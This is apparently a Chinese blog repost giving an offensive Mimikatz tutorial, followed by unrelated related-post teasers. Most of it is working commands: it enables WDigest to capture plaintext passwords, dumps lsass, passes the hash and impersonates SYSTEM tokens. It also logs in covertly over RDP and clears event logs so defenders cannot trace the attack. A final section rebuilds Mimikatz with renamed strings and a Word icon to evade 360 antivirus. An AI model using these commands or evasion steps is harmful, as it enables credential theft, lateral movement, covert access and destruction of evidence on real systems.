360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/323687.html

(0)

相关推荐

  • 骆驼祥子读书笔记摘抄(骆驼祥子读书笔记摘抄第十章)

    个别的解决,祥子没那么聪明。全盘的清算,他没那个魄力。于是,一点儿办法没有,整天际圈着满肚子委屈。正和一切的生命同样,受了损害之后,无可如何的只想由自己去收拾残局。那斗落了大腿的蟋蟀,还想用那些小腿儿爬。祥子没有一定的主意,只想慢慢的一天天,一件件的挨过去,爬到哪儿算哪儿,根本不想往起跳了。 离二十七还有十多天,他完全注意到这一天上去,心里想的,口中念道的,…

    2022-05-05
  • 防火墙产品,防火墙产品:保护网络安全的最佳选择

    网络安全已经成为现代企业不可或缺的一部分,因为企业数据资产的安全和稳定运行是企业生存和发展的重要保障。然而,随着网络攻击的不断增多和复杂化,企业需要通过使用各种网络安全产品来保护自己的网络和数据。在众多的网络安全产品中,企业如何选择合适的网络安全产品呢?本文将介绍企业选择网络安全产品的一些基本原则和建议。 确定企业的网络安全需求 企业选择网络安全产品的第一步…

    用户投稿 2023-05-12
  • 幻想三国志5,幻想三国志5完美结局达成条件

    经典仙侠游戏《幻想三国志》已于周六(12月25日)在STEAM上架系列作1-4代及4代外传,预计明年1月解锁与玩家见面。而深受玩家喜爱的《幻想三国志5》也将于明年1月推出免费DLC更新。 《幻想三国志5》除了极具特色的昼夜系统和战斗系统外,剧情也深受玩家们的喜爱。即将于明年1月推出的DLC除了延续本体一贯的战斗特色以及唯美画风外,对本体剧情也做出了一定补充。…

    2023-06-28 用户投稿
  • 珠海好玩的地方(珠海好玩的地方景点免费排名)

    大年初一,珠海天气晴好,节日气氛浓郁,正适合带上全家老小出门亲近自然,呼吸新年的新鲜空气。 为了让市民和游客在珠海度过一个丰富多彩、吉庆安康的春节,南方+推出“Go‘兔’珠海”系列活动预告,今天推出第三篇《阖家欢乐,珠海哪些地方适合全家出动?》。 活力无限 烟花、国潮热闹非凡 春节期间,珠海长隆将连续举办多场迎春活动,满足全面通关后港澳和国外等多地游客的文旅…

    2023-05-24 用户投稿
  • 小米移动不限速流量卡无限(学生防沉迷手机有哪些)

    移动互联网时代,人们获取信息的方式越来越容易,对手机的依赖程度逐渐加深。十几年前诞生的词汇“网瘾”放到今天来看,其实并不夸张。 根据2020年的调查,全国每天人均的手机时长已经达到了100分钟。如果除去老幼这类没有智能手机的人群,可以估算出人均使用手机时长要翻倍,达到200分钟。 面对手机泛滥的状况,大人们早已沦陷,孩子们的自控力更加薄弱,游戏短视频容易沉迷…

    2023-06-18 用户投稿
  • 魔兽服务器,魔兽亚服正式服服务器推荐

    WLK版本亚服工作室让很多玩家焦头烂额,甚至已经无法正常游戏了。不过相比60级永久服务器的环境来说,WLK版本也只能算小巫见大巫,原因是60级永久服务器已经彻底被脚本工作室控制了。   国服关闭之后,前往亚服的玩家大部分去了WLK服务器,小部分去了60级永久服务器。由于60级只有一个PVP服务器,所以这个服务器内也挤满了玩家。那么亚服永久60级的环…

    2023-06-26 用户投稿
  • qq空间psd源码,qq空间素材代码

    《关于qq空间psd源码的探索与思考》 一、引言在互联网的世界里,qq空间作为许多人分享生活点滴的重要平台,其背后的技术细节一直吸引着众多爱好者的关注。其中,qq空间psd源码更是一个神秘而令人好奇的领域。我一直对这个话题充满兴趣,也在不断地尝试去理解和探索它。今天,我就想和大家分享一下我对qq空间psd源码的一些见解和思考,也许能为那些同样感兴趣的人提供一…

    用户投稿 2025-11-11
  • 怎么看肝功能检验单,肝功能化验单如何看

    大家体检的时候,都会抽血检测肝功能,肝功能化验单怎么看呢?很多人都是一头雾水。今天就给大家简单的分析一下,相信大家看过之后,会看懂肝功能的检查单。 反应肝细胞损伤的指标  包括谷丙转氨酶(ALT)、谷草转氨酶(AST)、碱性磷酸酶(ALP)、谷氨酰转肽酶(GGT)。其中ALT和AST能灵敏的反映肝细胞损伤及损伤程度。各种急性病毒性肝炎、药物或酒精引起的急性肝…

    2023-07-11
  • cf由于主机问题,cf由于主机问题怎么解决

    《关于“cf由于主机问题”的深入探讨》 一、主机问题的常见表现形式 在cf(可能是某个特定的游戏或系统)的运行过程中,主机问题可能会以多种形式表现出来。也许最常见的就是游戏卡顿现象,就好像是电脑的处理器突然变慢了一样,画面的流畅度受到严重影响,角色的动作变得迟缓,仿佛时间都被定格了一般。这种卡顿可能会在游戏的特定场景中频繁出现,比如激烈的战斗场景或者复杂的地…

    2025-07-31
  • 地狱火护符,地狱火护符被动技能详解

    这一周过去了,我发现有人开始讨论地狱火护符的问题了。地狱火护符呢,它是《暗黑破坏神3》中一些BD必需的装备,他可以额外提供一个被动技能,想想啊,多一个被动技能多给力啊,下边就给大家带来暗黑破坏神3地狱火护符制作方法,帮助大家获得地狱火护符。 1地狱火图纸购买地点:第二幕剧情→秘密营地→小贩奎斯特。 说明:只购买地狱火护符的话,准备好500万金币。 &nbsp…

    2023-06-29
  • drupal教程,drupel

    以下是一篇关于“drupal教程”的文章: 一、Drupal是什么? Drupal可能是一款非常强大的内容管理系统(CMS)。我觉得它就像是一个数字世界的“建筑师”,能够帮助我们构建各种各样的网站。也许它最擅长的就是处理复杂的内容组织和管理,让网站的内容能够井井有条地呈现给用户。 在很多大型企业、政府机构以及各类网站中,都能看到Drupal的身影。它好像是有…

    2025-12-26
  • 360安全桌面怎么卸载,电脑垃圾清理哪个好

    咱国内互联网环境下,提系统安全、垃圾清理总绕不开腾讯和 360。 这两家说实话节操不多,但产品确实做得好。 无论 UI 还是功能都符合国人审美和习惯。 让男女老少都能轻易上手。 所以即使现在网速从 「2G」 涨到 「5G」。 装机量最大的软件还是那几个。 要说什么毁了这些好软件。 弹窗、捆绑、广告推广一个不少。 但正如我们前段时间安利过的腾讯电脑管家独立版。…

    2023-07-11